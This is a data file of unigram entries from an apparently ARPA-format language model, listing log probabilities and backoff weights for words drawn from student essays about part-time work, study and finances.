-3.9746375 recently-graduated -0.098042734
-3.9746375 woefully -0.098042734
-3.9746375 unprepared -0.098042734
-3.8506508 realities -0.098042734
-3.153469 responsibilities -0.14784537
-3.8506508 particularly -0.098042734
-2.8938322 university -0.21144658
-3.340989 used -0.20720947
-3.678229 staying -0.098042734
-2.7521589 up -0.19388978
-3.340989 late -0.098042734
-3.8506508 night -0.21423665
-3.678229 sleeping -0.098042734
-3.9746375 neglecting -0.098042734
-3.8506508 commitments -0.098042734
-3.0229268 no -0.12131027
-3.4271748 immediate -0.098042734
-3.9746375 repercussions -0.098042734
-3.5348082 result -0.14086568
-3.2074509 difficult -0.3447334
-3.153469 make -0.13503471
-3.5348082 lifestyle -0.098042734
-3.9746375 adjustment -0.098042734
-3.9746375 subsequent -0.098042734
-3.8506508 A -0.11285661
-3.9746375 undertaken -0.098042734
-3.2691073 still -0.098042734
-3.4271748 quite -0.098042764
-3.678229 helpful -0.17195599
-3.678229 regard -0.1522653
-3.9746375 Maintaining -0.098042734
-3.9746375 exercise -0.098042734
-3.153469 personal -0.098042734
-3.8506508 recent -0.21423665
-3.340989 graduates -0.1281937
-3.8506508 similarly -0.098042734
-3.9746375 difficulty -0.098042734
-3.5348082 managing -0.23276964
-3.2074509 finances -0.14589529
-3.8506508 responsibly -0.098042734
-3.9746375 western -0.098042734
-3.678229 countries -0.17195599
-3.8506508 unfortunate -0.098042734
-3.8506508 reality -0.098042734
-3.9746375 combines -0.098042734
-3.8506508 levels -0.098042734
-3.4271748 debt -0.14086568
-3.4271748 credit -0.45026425
-3.8506508 cards -0.13342881
-3.340989 loans -0.13342881
-3.8506508 etc. -0.17195599
-3.9746375 grave -0.098042734
-3.9746375 peril -0.098042734
-3.8506508 providing -0.098042734
-3.5348082 cash -0.098042734
-3.9746375 flow -0.098042734
-3.8506508 least -0.098042734
-3.8506508 small -0.098042734
-2.9868817 income -0.1281937
-2.6300275 which -0.26262486
-3.9746375 counter -0.098042734
-3.9746375 debts -0.098042734
-3.8506508 largely -0.098042734
-3.9746375 Firstly -0.098042734
-3.5348082 been -0.098042734
-3.8506508 myself -0.098042734
-3.8506508 am -0.098042764
-3.678229 aware -0.098042734
-3.678229 pressures -0.098042734
-3.9746375 generated -0.098042734
-2.9536004 living -0.38954097
-3.5348082 expenses -0.098042734
-3.9746375 Often -0.098042734
-2.6150792 these -0.16411746
-3.9746375 met -0.098042734
-3.9746375 combination -0.098042734
-3.9746375 grants -0.098042734
-3.0622365 family -0.15366085
-3.8506508 savings -0.098042734
-3.9746375 restrict -0.098042734
-2.8938322 during -0.29814366
-3.8506508 crucial -0.098042734
-3.5348082 period -0.14086568
-3.340989 adult -0.098042734
-3.4271748 development -0.29227865
-3.2691073 earning -0.1522653
-3.9746375 constructive -0.098042734
-2.9868817 way -0.23310995
-3.9746375 easing -0.098042734
-3.678229 allowing -0.098042734
-3.4271748 lead -0.37145987
-3.5348082 independent -0.1605951
-3.8506508 Secondly -0.21423665
-3.9746375 regards -0.098042734
-3.9746375 prospects -0.098042734
-3.8506508 rarely -0.098042734
-3.340989 factor -0.098042734
-3.8506508 majority -0.21423665
-3.4271748 graduate -0.12430835
-3.153469 professional -0.12131027
-3.9746375 transferable -0.098042734
-3.5348082 ability -0.14086568
-3.9746375 communicate -0.098042734
-3.0622365 customers -0.17496733
-3.2691073 responsible -0.17723958
-3.678229 almost -0.098042734
-3.9746375 achievement -0.098042734
-3.9746375 Not -0.098042734
-3.9746375 demonstrating -0.098042734
-3.9746375 attributes -0.098042734
-3.678229 aspects -0.35337758
-3.4271748 enjoy -0.13342881
-3.9746375 expect -0.098042734
-3.2691073 once -0.2741563
-3.9746375 Thirdly -0.098042734
-3.9746375 wider -0.098042734
-3.9746375 scale -0.098042734
-3.8506508 necessity -0.098042734
-3.9746375 economical -0.098042734
-3.4271748 sense -0.3119509
-3.8506508 businesses -0.098042734
-3.8506508 require -0.098042734
-3.678229 force -0.098042734
-3.8506508 flexible -0.098042734
-3.9746375 fill -0.098042734
-2.645509 would -0.25441036
-3.678229 member -0.35337758
-3.9746375 staff -0.098042734
-3.9746375 contrast -0.098042734
-3.5348082 arguments -0.098042734
-3.340989 however -0.24782339
-3.9746375 cope -0.098042734
-3.8506508 depends -0.098042734
-3.5348082 situation -0.21423665
-3.9746375 determined -0.098042734
-3.9746375 condition -0.098042734
-3.2074509 year -0.17723958
-3.8506508 type -0.21423665
-3.9746375 builds -0.098042734
-3.9746375 encourages -0.098042734
-3.8506508 stake -0.098042734
-2.7521589 education -0.32130542
-3.8506508 prepares -0.21423665
-3.0229268 world -0.18407424
-3.9746375 encounter -0.098042734
-3.9746375 countless -0.098042734
-3.9746375 acquired -0.098042734
-3.9746375 readily -0.098042734
-3.9746375 apparent -0.098042734
-3.5348082 balancing -0.098042734
-3.9746375 Skills -0.098042734
-3.9746375 prioritization -0.098042734
-3.9746375 multitasking -0.098042734
-3.5348082 finding -0.23276964
-3.2074509 success -0.14086568
-2.9536004 going -0.5208247
-3.340989 provides -0.13342881
-3.8506508 perfect -0.098042734
-3.5348082 training -0.1522653
-3.8506508 ground -0.098042734
-3.678229 improve -0.098042734
-3.9746375 Too -0.098042734
-3.5348082 burden -0.1522653
-3.8506508 supported -0.098042734
-3.4271748 entirely -0.098042734
-3.9746375 consequence -0.098042734
-3.8506508 concept -0.21423665
-3.678229 actual -0.1522653
-3.340989 cost -0.45026425
-3.9746375 Without -0.098042734
-3.8506508 `` -0.098042734
-3.678229 '' -0.098042734
-3.2691073 place -0.12430835
-3.340989 importance -0.1605951
-3.153469 were -0.13679342
-3.9746375 coming -0.098042734
-2.7136247 out -0.22350419
-3.340989 own -0.10952071
-3.9746375 pockets -0.098042734
-3.9746375 That -0.098042734
-2.866774 where -0.23291408
-3.8506508 contribute -0.098042734
-3.678229 giving -0.098042734
-3.4271748 value -0.20895563
-3.2691073 find -0.15366085
-3.4271748 transition -0.20720947
-3.5348082 campus -0.14086568
-3.9746375 campuses -0.098042734
-3.9746375 unique -0.098042734
-3.9746375 environments -0.098042734
-3.9746375 passion -0.098042734
-2.8413033 learning -0.21896097
-3.9746375 discovery -0.098042734
-3.9746375 cultivated -0.098042734
-3.8506508 continue -0.098042734
-3.9746375 maintain -0.098042734
-3.678229 explore -0.098042764
-3.9746375 talents -0.098042734
-3.4271748 interests -0.098042734
-3.153469 full -0.35333085
-3.8506508 extent -0.098042734
-2.922689 without -0.14086564
-3.8506508 worrying -0.21423665
-2.866774 about -0.12520002
-3.8506508 translate -0.098042734
-3.678229 directly -0.17195599
-3.9746375 salable -0.098042734
-3.9746375 product -0.098042734
-3.9746375 ones -0.098042734
-3.8506508 expose -0.21423665
-3.8506508 partially -0.098042734
-3.9746375 awaits -0.098042734
-3.9746375 Should -0.098042734
-3.8506508 answer -0.098042734
-3.8506508 question -0.098042734
-3.9746375 subjective -0.098042734
-3.9746375 blanket -0.098042734
-3.9746375 yes-or-no -0.098042734
-3.8506508 overlook -0.21423665
-3.4271748 various -0.098042734
-3.678229 factors -0.098042734
-3.340989 different -0.13342881
-3.5348082 limited -0.1522653
-3.9746375 supplies -0.098042734
-3.9746375 probable -0.098042734
-3.4271748 impact -0.20720947
-3.8506508 energy -0.098042734
-3.9746375 reduction -0.098042734
-3.8506508 effectiveness -0.098042734
-3.9746375 completing -0.098042734
-3.5348082 assignments -0.098042734
-3.9746375 relevance -0.098042734
-3.9746375 Considerations -0.098042734
-3.9746375 pertaining -0.098042734
-3.9746375 fairly -0.098042734
-3.8506508 straightforward -0.098042734
-3.2691073 either -0.098042764
-3.5348082 requires -0.098042734
-3.0229268 support -0.16036421
-3.9746375 rises -0.098042734
-3.9746375 falls -0.098042734
-3.9746375 relation -0.098042734
-3.2691073 second -0.18983142
-3.2691073 never -0.14589529
-2.9868817 too -0.28712735
-3.340989 great -0.098042734
-3.8506508 relative -0.21423665
-3.8506508 addition -0.21423665
-3.9746375 scholastic -0.098042734
-3.678229 keep -0.098042734
-3.678229 last -0.098042734
-3.8506508 complicated -0.098042734
-3.8506508 determination -0.098042734
-3.8506508 stand -0.098042734
-3.5348082 particular -0.14086568
-3.8506508 convenience -0.098042734
-3.9746375 store -0.098042734
-3.2074509 someone -0.098042734
-3.2691073 business -0.18983142
-3.9746375 Each -0.098042734
-3.678229 weigh -0.098042734
-3.678229 decide -0.1522653
-3.4271748 based -0.37108302
-3.9746375 particulars -0.098042734
-3.5348082 feel -0.1281937
-3.340989 allows -0.47831634
-3.340989 start -0.21344972
-3.8506508 building -0.098042734
-3.9746375 strong -0.098042734
-3.9746375 ethic -0.098042734
-3.8506508 ease -0.17195599
-3.9746375 Young -0.098042734
-3.678229 subjects -0.098042734
-2.9536004 learn -0.27956232
-3.2691073 lessons -0.19561017
-3.678229 successful -0.098042734
-3.9746375 saving -0.098042734
-3.340989 free -0.13342881
-3.9746375 structure -0.098042734
-3.9746375 divide -0.098042734
-3.678229 areas -0.098042734
-3.678229 contacts -0.098042734
-3.5348082 best -0.098042734
-3.9746375 intends -0.098042734
-3.9746375 pursue -0.098042734
-3.9746375 exhausting -0.098042734
-3.9746375 So -0.098042764
-3.340989 let -0.1605951
-3.5348082 becomes -0.098042734
-3.9746375 time-consuming -0.098042734
-3.8506508 stressful -0.098042734
-3.9746375 priorities -0.098042734
-3.9746375 straight -0.098042734
-3.5348082 quit -0.098042764
-3.153469 rather -0.62635547
-2.9868817 than -0.116145
-3.8506508 sacrifice -0.098042734
-3.9746375 Despite -0.098042734
-3.8506508 risks -0.098042734
-3.4271748 though -0.098042734
-3.2691073 beneficial -0.18983142
-3.9746375 imply -0.098042734
-3.2074509 just -0.12131027
-3.8506508 pocket -0.21423665
-3.8506508 Some -0.1281937
-3.2691073 possible -0.19513752
-3.0229268 those -0.21913707
-3.4271748 final -0.18837766
-2.8938322 years -0.1851878
-3.8506508 medicine -0.098042734
-3.2691073 three -0.24782339
-3.8506508 lesson -0.098042734
-3.0622365 before -0.20159532
-3.5348082 enter -0.12430835
-3.5348082 taste -0.274173
-3.2691073 come -0.22739327
-3.678229 manage -0.098042734
-3.9746375 secure -0.098042734
-3.4271748 means -0.18983142
-3.8506508 relying -0.21423665
-3.8506508 organizations -0.098042734
-3.9746375 Perhaps -0.098042734
-3.9746375 Lastly -0.098042734
-3.9746375 lying -0.098042734
-3.678229 beyond -0.17195599
-3.9746375 gates -0.098042734
-3.1054616 outside -0.4612686
-3.9746375 circles -0.098042734
-3.4271748 meet -0.12430835
-3.0622365 new -0.11185315
-3.8506508 offers -0.098042734
-3.9746375 considered -0.098042734
-3.1054616 against -0.31554228
-3.5348082 load -0.098042734
-2.866774 much -0.1445523
-3.8506508 hinder -0.098042734
-3.5348082 performance -0.1522653
-3.340989 books -0.18983142
-3.9746375 hindrance -0.098042734
-3.2691073 worked -0.118926615
-2.5472004 my -0.18626033
-3.340989 did -0.17723958
-3.0229268 really -0.11097703
-3.2691073 until -0.098042764
-3.9746375 weeks -0.098042734
-3.8506508 workload -0.098042734
-3.2074509 was -0.098042734
-3.9746375 huge -0.098042734
-3.2074509 go -0.21358076
-3.8506508 conclude -0.098042734
-3.4271748 now -0.14086568
-3.2074509 needs -0.22443497
-3.340989 costs -0.22739327
-3.678229 certain -0.098042734
-3.1054616 understand -0.3119509
-3.8506508 matter -0.098042734
-3.4271748 every -0.098042734
-3.4271748 afford -0.1281937
-3.9746375 maintaining -0.098042734
-3.9746375 son -0.098042734
-3.9746375 daughter -0.098042734
-3.8506508 dedicate -0.21423665
-3.5348082 him -0.098042734
-3.9746375 herself -0.098042734
-3.9746375 moreover -0.098042734
-2.9868817 getting -0.18788324
-3.678229 higher -0.098042734
-3.9746375 Nevertheless -0.098042734
-3.678229 extreme -0.098042734
-3.9746375 maturing -0.098042734
-3.9746375 consume -0.098042734
-3.9746375 momentum -0.098042734
-3.9746375 preciously -0.098042734
-3.9746375 innumerous -0.098042734
-2.922689 hard -0.2925273
-3.8506508 so-called -0.098042734
-3.4271748 back -0.14086568
-3.8506508 classrooms -0.098042734
-3.4271748 lack -0.37108302
-3.8506508 power -0.098042734
-3.5348082 concentrate -0.14086568
-3.8506508 active -0.098042734
-3.9746375 role -0.098042734
-3.678229 process -0.17195599
-2.9868817 ! -0.707252
-3.9746375 resting -0.098042734
-3.9746375 acquiring -0.098042734
-3.9746375 exclusively -0.098042734
-3.340989 poor -0.098042734
-3.678229 participation -0.17195599
-3.9746375 dedicated -0.098042734
-3.8506508 solution -0.098042734
-3.9746375 scholarships -0.098042734
-3.8506508 government -0.098042734
-3.4271748 system -0.098042734
-3.5348082 allow -0.098042734
-3.678229 practice -0.098042734
-3.8506508 comparison -0.098042734
-2.8413033 young -0.4036615
-3.4271748 adults -0.20720947
-3.8506508 tend -0.21423665
-3.2691073 always -0.098042734
-3.9746375 specialisation -0.098042734
-3.9746375 counterparts -0.098042734
-3.9746375 Generally -0.098042734
-3.9746375 non -0.098042734
-3.9746375 adapt -0.098042734
-3.8506508 relatively -0.098042734
-3.5348082 short -0.098042734
-3.4271748 problem -0.098042764
-3.2691073 since -0.12131027
-3.2691073 change -0.1605951
-3.9746375 manageable -0.098042734
-3.678229 concerned -0.098042734
-3.8506508 sophisticated -0.098042734
-3.8506508 whilst -0.098042734
-3.9746375 furthering -0.098042734
-3.5348082 insight -0.1522653
-3.9746375 assimilation -0.098042734
-3.9746375 bridging -0.098042734
-3.340989 effect -0.13342881
-3.678229 enables -0.098042734
-3.8506508 quickly -0.098042734
-3.9746375 leap -0.098042734
-3.8506508 Working -0.1281937
-3.5348082 teaches -0.23276964
-3.8506508 theory -0.098042734
-3.2691073 universities -0.1281937
-3.5348082 likely -0.14086568
-3.9746375 budgeting -0.098042734
-3.9746375 ethics -0.098042734
-3.0622365 workplace -0.16288683
-3.8506508 productivity -0.098042734
-3.9746375 manner -0.098042734
-3.9746375 issues -0.098042734
-3.340989 instead -0.3119509
-3.9746375 core -0.098042734
-3.8506508 material -0.098042734
-3.9746375 respective -0.098042734
-3.9746375 We -0.098042734
-3.9746375 hope -0.098042734
-3.8506508 principle -0.098042734
-3.5348082 concern -0.098042734
-3.9746375 But -0.098042734
-3.9746375 definition -0.098042734
-3.8506508 worker -0.098042734
-3.9746375 follows -0.098042734
-3.4271748 problems -0.20720947
-3.340989 perhaps -0.098042734
-3.2074509 fully -0.098042734
-3.2691073 families -0.098042734
-3.9746375 Others -0.098042734
-3.9746375 older -0.098042734
-3.9746375 saved -0.098042734
-3.678229 courses -0.098042734
-3.9746375 began -0.098042734
-3.8506508 fall -0.098042734
-3.9746375 somewhere -0.098042734
-3.2074509 between -0.12430835
-3.9746375 bit -0.098042734
-3.9746375 book -0.098042734
-3.4271748 hold -0.098042734
-3.8506508 escape -0.21423665
-3.9746375 confines -0.098042734
-3.8506508 worlds -0.098042734
-3.8506508 brought -0.098042734
-3.4271748 far -0.098042734
-3.9746375 dip -0.098042734
-3.9746375 toes -0.098042734
-3.9746375 unfathomable -0.098042734
-3.9746375 waters -0.098042734
-3.9746375 immersed -0.098042734
-3.9746375 Thereby -0.098042734
-3.8506508 preparing -0.17195599
-3.9746375 traverse -0.098042734
-3.678229 rest -0.098042734
-3.340989 lives -0.13679342
-3.9746375 Wages -0.098042734
-3.9746375 gainful -0.098042734
-3.8506508 sample -0.098042734
-3.9746375 delights -0.098042734
-3.1054616 want -0.2983345
-3.678229 try -0.1522653
-2.866774 things -0.21986672
-3.9746375 previously -0.098042734
-3.9746375 unavailable -0.098042734
-3.8506508 rounded -0.098042734
-3.4271748 takes -0.13342881
-3.8506508 hopefully -0.098042734
-3.340989 appreciate -0.18983142
-3.9746375 paying -0.098042734
-3.9746375 next -0.098042734
-3.8506508 round -0.098042734
-3.9746375 drinks -0.098042734
-3.9746375 Students -0.098042734
-3.8506508 definitely -0.098042734
-3.5348082 harder -0.098042734
-3.8506508 suffer -0.098042734
-3.9746375 Suffering -0.098042734
-3.8506508 wo -0.21423665
-3.9746375 kill -0.098042734
-3.9746375 Part -0.098042734
-3.678229 fun -0.17195599
-3.9746375 Jobs -0.098042734
-3.9746375 mostly -0.098042734
-3.4271748 basic -0.098042734
-3.678229 simple -0.17195599
-3.4271748 tasks -0.098042734
-3.8506508 suffering -0.098042734
-3.5348082 labor -0.098042734
-3.9746375 fatal -0.098042734
-3.9746375 timing -0.098042734
-3.340989 Japan -0.13847902
-3.8506508 America -0.1522653
-3.5348082 rent -0.098042734
-3.8506508 married -0.098042734
-3.2691073 generally -0.098042764
-3.2691073 freedom -0.19513752
-3.9746375 sophomore -0.098042734
-3.9746375 sophomores -0.098042734
-3.9746375 4th -0.098042734
-3.678229 service -0.098042734
-3.9746375 prime -0.098042734
-3.340989 purpose -0.2741563
-3.9746375 Cleaning -0.098042734
-3.9746375 toilets -0.098042734
-3.9746375 serving -0.098042734
-3.9746375 burgers -0.098042734
-3.2691073 waste -0.1605951
-3.2691073 think -0.20801851
-3.2691073 anything -0.1281937
-3.8506508 argue -0.098042734
-3.9746375 Maybe -0.098042734
-3.5348082 serve -0.098042734
-3.9746375 clean -0.098042734
-3.8506508 dishes -0.098042734
-3.9746375 pales -0.098042734
-3.9746375 international -0.098042734
-3.5348082 law -0.14086568
-3.8506508 advanced -0.098042734
-3.9746375 mechanical -0.098042734
-3.4271748 focused -0.23276964
-3.678229 truly -0.098042734
-3.4271748 why -0.12131027
-3.2691073 made -0.098042734
-3.9746375 affordable -0.098042734
-3.9746375 smart -0.098042734
-3.9746375 gifted -0.098042734
-3.8506508 proper -0.098042734
-3.4271748 reduce -0.20720947
-3.9746375 firmly -0.098042734
-3.9746375 encouraged -0.098042734
-3.678229 reach -0.098042734
-3.9746375 meaningless -0.098042734
-3.9746375 unchallenging -0.098042734
-3.9746375 pointless -0.098042734
-3.5348082 anyone -0.098042734
-3.678229 fortunate -0.098042734
-3.9746375 attend -0.098042734
-3.8506508 everyone -0.098042734
-3.5348082 wisely -0.1522653
-3.678229 moving -0.17195599
-3.8506508 refrain -0.21423665
-3.8506508 circle -0.098042734
-3.8506508 knows -0.098042734
-3.8506508 precious -0.098042734
-3.9746375 commodity -0.098042734
-3.9746375 Consider -0.098042734
-3.9746375 average -0.098042734
-3.678229 20 -0.35337758
-3.1054616 hours -0.22398719
-3.8506508 5 -0.098042734
-3.2074509 days -0.14504822
-3.5348082 week -0.118926615
-3.9746375 Getting -0.098042734
-3.8506508 ready -0.098042734
-3.9746375 driving -0.098042734
-3.678229 easily -0.098042734
-3.5348082 hour -0.098042734
-3.8506508 each -0.098042734
-2.9868817 day -0.19507152
-3.9746375 25 -0.098042734
-3.8506508 lost -0.098042734
-3.8506508 per -0.21423665
-3.678229 risk -0.17195599
-3.8506508 cause -0.098042734
-3.8506508 added -0.098042734
-3.8506508 frustration -0.098042734
-3.9746375 friendly -0.098042734
-3.8506508 coworkers -0.098042734
-3.9746375 bound -0.098042734
-3.9746375 tempting -0.098042734
-3.9746375 urged -0.098042734
-3.678229 soon -0.098042734
-3.8506508 First -0.17195599
-3.8506508 dependent -0.098042734
-3.9746375 child -0.098042734
-3.9746375 rapidly -0.098042734
-3.9746375 underway -0.098042734
-3.9746375 Quite -0.098042734
-3.9746375 moved -0.098042734
-3.1054616 home -0.29263094
-3.0229268 responsibility -0.19561017
-3.9746375 ranging -0.098042734
-3.9746375 bed -0.098042734
-3.678229 sure -0.098042734
-3.8506508 homework -0.098042734
-3.8506508 completed -0.098042734
-3.9746375 dormitories -0.098042734
-3.9746375 breakfast -0.098042734
-3.678229 lunch -0.098042734
-3.9746375 dinner -0.098042734
-3.9746375 never-the-less -0.098042734
-3.8506508 build -0.098042734
-3.9746375 identity -0.098042734
-3.8506508 fve -0.098042734
-3.678229 mentioned -0.098042734
-3.9746375 admit -0.098042734
-3.8506508 seem -0.098042734
-3.9746375 handle -0.098042734
-3.340989 person -0.13679342
-3.9746375 teens -0.098042734
-3.4271748 early -0.14086568
-3.9746375 twenties -0.098042734
-3.8506508 adding -0.17195599
-3.9746375 unnecessary -0.098042734
-3.9746375 contrary -0.098042734
-3.9746375 aforementioned -0.098042734
-3.8506508 list -0.21423665
-3.9746375 remuneration -0.098042734
-3.9746375 satisfaction -0.098042734
-3.678229 gaining -0.098042734
-3.340989 independence -0.12131027
-3.8506508 enormous -0.098042734
-3.9746375 self-esteem -0.098042734
-3.8506508 manifest -0.098042734
-3.9746375 improved -0.098042734
-3.5348082 growing -0.274173
-3.8506508 securing -0.098042734
-3.8506508 dating -0.098042734
-3.8506508 easier -0.098042734
-3.8506508 ask -0.098042734
-3.8506508 view -0.098042734
-3.678229 big -0.098042734
-3.8506508 party -0.098042734
-3.4271748 drinking -0.14086568
-3.8506508 joining -0.098042734
-3.4271748 clubs -0.14086568
-3.9746375 washing -0.098042734
-3.9746375 My -0.098042734
-3.9746375 create -0.098042734
-3.9746375 Australia -0.098042734
-3.678229 studied -0.098042734
-3.4271748 University -0.098042734
-3.9746375 Technology -0.098042734
-3.9746375 Sydney -0.098042734
-3.9746375 8,000 -0.098042734
-3.9746375 75 -0.098042734
-3.8506508 % -0.098042734
-3.8506508 knew -0.098042734
-3.2691073 companies -0.098042734
-3.9746375 hire -0.098042734
-3.8506508 test -0.098042734
-3.9746375 character -0.098042734
-3.8506508 positive -0.098042734
-3.8506508 thing -0.098042734
-3.2074509 point -0.1522653
-3.9746375 indirectly -0.098042734
-3.9746375 cheaper -0.098042734
-3.9746375 taxpayers -0.098042734
-3.8506508 summary -0.098042734
-3.9746375 Overall -0.098042734
-3.2691073 both -0.098042734
-3.678229 economy -0.35337758
-3.8506508 easy -0.098042734
-3.9746375 hide -0.098042734
-3.8506508 stay -0.098042734
-3.9746375 attached -0.098042734
-3.9746375 backdrop -0.098042734
-3.9746375 lots -0.098042734
-3.9746375 bare -0.098042734
-3.9746375 facts -0.098042734
-3.678229 obtain -0.1281937
-3.9746375 converted -0.098042734
-3.8506508 wisdom -0.098042734
-3.9746375 broader -0.098042734
-3.9746375 departments -0.098042734
-3.9746375 strictly -0.098042734
-3.8506508 common -0.098042734
-3.9746375 More -0.098042734
-3.8506508 break -0.098042734
-3.678229 -- -0.098042734
-3.9746375 subconscious -0.098042734
-3.9746375 processes -0.098042734
-3.9746375 information -0.098042734
-3.0622365 class -0.25014567
-3.5348082 concentration -0.1522653
-3.8506508 connections -0.098042734
-3.8506508 ca -0.21423665
-3.9746375 pure -0.098042734
-3.9746375 association -0.098042734
-3.9746375 faculty -0.098042734
-3.8506508 enrich -0.21423665
-3.8506508 whose -0.098042734
-3.678229 ultimately -0.098042734
-3.9746375 remain -0.098042734
-3.678229 company -0.17195599
-3.9746375 network -0.098042734
-3.678229 end -0.1522653
-3.9746375 needing -0.098042734
-3.9746375 Student -0.098042734
-3.9746375 record -0.098042734
-3.8506508 references -0.098042734
-3.2691073 individual -0.115375474
-3.8506508 coursework -0.098042734
-3.8506508 applications -0.098042734
-3.9746375 Practical -0.098042734
-3.8506508 background -0.098042734
-3.9746375 principles -0.098042734
-3.0622365 he -0.16875425
-3.678229 she -0.14086568
-3.9746375 specific -0.098042734
-3.8506508 wants -0.098042734
-3.9746375 Real-world -0.098042734
-3.5348082 mature -0.1522653
-3.9746375 functioning -0.098042734
-3.5348082 members -0.47831634
-3.8506508 instils -0.098042734
-3.2691073 discipline -0.2741563
-3.9746375 fulfill -0.098042734
-3.678229 expectations -0.1522653
-3.9746375 abide -0.098042734
-3.9746375 rules -0.098042734
-3.9746375 filing -0.098042734
-3.9746375 correspondence -0.098042734
-3.9746375 organized -0.098042734
-3.9746375 attentive -0.098042734
-3.9746375 details -0.098042734
-3.5348082 realize -0.23276964
-3.5348082 co-workers -0.098042734
-3.678229 rely -0.35337758
-3.9746375 efficient -0.098042734
-3.9746375 motivate -0.098042734
-3.678229 diligent -0.17195599
-3.9746375 earlier -0.098042734
-3.2074509 age -0.18439111
-3.9746375 Second -0.098042734
-3.9746375 broadens -0.098042734
-3.4271748 interest -0.23276964
-3.9746375 opens -0.098042734
-3.9746375 array -0.098042734
-3.5348082 possibilities -0.1522653
-3.678229 yet -0.098042734
-3.8506508 clear -0.098042734
-3.9746375 Actual -0.098042734
-3.5348082 determine -0.098042734
-3.5348082 kind -0.47831634
-3.9746375 likes -0.098042734
-3.9746375 dislikes -0.098042734
-3.9746375 managerial -0.098042734
-3.8506508 finance -0.098042734
-3.678229 human -0.098042734
-3.5348082 resources -0.1522653
-3.9746375 interns -0.098042734
-3.9746375 advertising -0.098042734
-3.9746375 agency -0.098042734
-3.678229 discover -0.098042734
-3.9746375 aptitude -0.098042734
-3.9746375 graphic -0.098042734
-3.9746375 design -0.098042734
-3.9746375 copywriting -0.098042734
-3.9746375 hands-on -0.098042734
-3.9746375 richer -0.098042734
-3.678229 basis -0.098042734
-3.678229 planning -0.098042734
-3.9746375 waiting -0.098042734
-3.340989 around -0.098042734
-3.9746375 rigors -0.098042734
-3.9746375 dynamics -0.098042734
-3.9746375 Usually -0.098042734
-3.678229 confidence -0.17195599
-3.9746375 ggreen -0.098042734
-3.5348082 h -0.098042734
-3.9746375 familiarize -0.098042734
-3.8506508 office -0.098042734
-3.678229 hierarchies -0.098042734
-3.9746375 situate -0.098042734
-3.9746375 newcomer -0.098042734
-3.8506508 guidance -0.21423665
-3.9746375 mentoring -0.098042734
-3.9746375 Attending -0.098042734
-3.9746375 writing -0.098042734
-3.9746375 essays -0.098042734
-3.8506508 reports -0.098042734
-3.8506508 side -0.098042734
-3.9746375 normally -0.098042734
-3.678229 taken -0.1522653
-3.5348082 needed -0.098042734
-3.8506508 turn -0.098042734
-3.9746375 sleep -0.098042734
-3.678229 essential -0.14086568
-3.2691073 later -0.22839211
-3.2691073 actually -0.098042764
-3.9746375 Along -0.098042734
-3.9746375 career-oriented -0.098042734
-3.678229 choosing -0.17195599
-3.9746375 All -0.098042764
-3.9746375 secretary -0.098042734
-3.678229 manager -0.098042734
-3.8506508 treasurer -0.098042734
-3.9746375 Taking -0.098042734
-3.9746375 instance -0.098042734
-3.9746375 plan -0.098042734
-3.9746375 branch -0.098042734
-3.678229 budget -0.098042734
-3.9746375 fd -0.098042734
-3.9746375 saying -0.098042734
-3.9746375 inside -0.098042734
-3.678229 concentrating -0.35337758
-3.8506508 fact -0.098042734
-3.4271748 hand -0.17723958
-3.8506508 loss -0.21423665
-3.9746375 genuine -0.098042734
-3.8506508 engaging -0.21423665
-3.9746375 play -0.098042734
-3.9746375 instrument -0.098042734
-3.9746375 sports -0.098042734
-3.340989 simply -0.098042764
-3.8506508 hang -0.21423665
-3.9746375 friend -0.098042734
-3.678229 developing -0.098042734
-3.9746375 danger -0.098042734
-3.9746375 ending -0.098042734
-3.9746375 materialistic -0.098042734
-3.9746375 inclined -0.098042734
-3.9746375 diminished -0.098042734
-3.9746375 understating -0.098042734
-2.8413033 our -0.108908966
-3.9746375 beings -0.098042734
-3.9746375 ... -0.098042734
-2.6955683 we -0.20619403
-3.9746375 sooner -0.098042734
-3.4271748 opinion -0.1985482
-3.9746375 rush -0.098042734
-3.8506508 concentrated -0.098042734
-3.5348082 its -0.098042734
-3.340989 us -0.098042764
-3.678229 causes -0.098042734
-3.9746375 unhappiness -0.098042734
-3.9746375 love -0.098042734
-3.9746375 sole -0.098042734
-3.678229 few -0.098042734
-3.9746375 bucks -0.098042734
-3.8506508 distraction -0.098042734
-3.678229 further -0.098042734
-3.9746375 cloud -0.098042734
-3.9746375 tricky -0.098042734
-3.9746375 monetary -0.098042734
-3.9746375 enslavement -0.098042734
-3.4271748 live -0.098042734
-3.8506508 under -0.098042734
-3.9746375 span -0.098042734
-3.9746375 childhood -0.098042734
-3.9746375 assure -0.098042734
-3.678229 mental -0.098042734
-3.9746375 stability -0.098042734
-3.9746375 Every -0.098042734
-2.866774 his -0.13503471
-3.4271748 her -0.098042764
-3.9746375 No -0.098042734
-3.9746375 deviation -0.098042734
-3.678229 allowed -0.274173
-3.8506508 absolutely -0.098042734
-3.9746375 executed -0.098042734
-3.8506508 conditions -0.098042734
-3.9746375 Studying -0.098042734
-3.8506508 influence -0.098042734
-3.678229 sometimes -0.098042734
-3.9746375 fate -0.098042734
-3.9746375 Depending -0.098042734
-3.9746375 destiny -0.098042734
-3.9746375 entire -0.098042734
-3.8506508 generations -0.098042734
-3.8506508 damage -0.098042734
-3.9746375 irreversible -0.098042734
-3.9746375 qualified -0.098042734
-3.9746375 causing -0.098042734
-3.9746375 nation -0.098042734
-3.9746375 Even -0.098042734
-3.8506508 direct -0.098042734
-3.9746375 wastes -0.098042734
-3.9746375 production -0.098042734
-3.678229 above -0.098042734
-3.8506508 institutions -0.098042734
-3.9746375 priority -0.098042734
-3.9746375 agendas -0.098042734
-3.9746375 excuses -0.098042734
-3.9746375 delay -0.098042734
-3.9746375 action -0.098042734
-3.9746375 accepted -0.098042734
-3.2074509 right -0.15792
-3.9746375 assured -0.098042734
-3.9746375 self-improvement -0.098042734
-3.9746375 worthwhile -0.098042734
-3.9746375 serves -0.098042734
-3.9746375 element -0.098042734
-3.9746375 preparatory -0.098042734
-3.5348082 stage -0.098042734
-3.678229 country -0.098042734
-3.9746375 Asia -0.098042734
-3.9746375 whereby -0.098042734
-3.9746375 obliged -0.098042734
-3.9746375 self-supporting -0.098042734
-3.340989 save -0.18983142
-3.9746375 augment -0.098042734
-3.8506508 whole -0.098042734
-3.678229 among -0.17195599
-3.8506508 youth -0.17195599
-3.9746375 On -0.098042734
-3.4271748 his\/her -0.098042734
-3.9746375 promotes -0.098042734
-3.9746375 duties -0.098042734
-3.9746375 assigned -0.098042734
-3.8506508 virtues -0.098042734
-3.9746375 hard-work -0.098042734
-3.9746375 teamwork -0.098042734
-3.5348082 respect -0.1522653
-3.9746375 authority -0.098042734
-3.9746375 Although -0.098042734
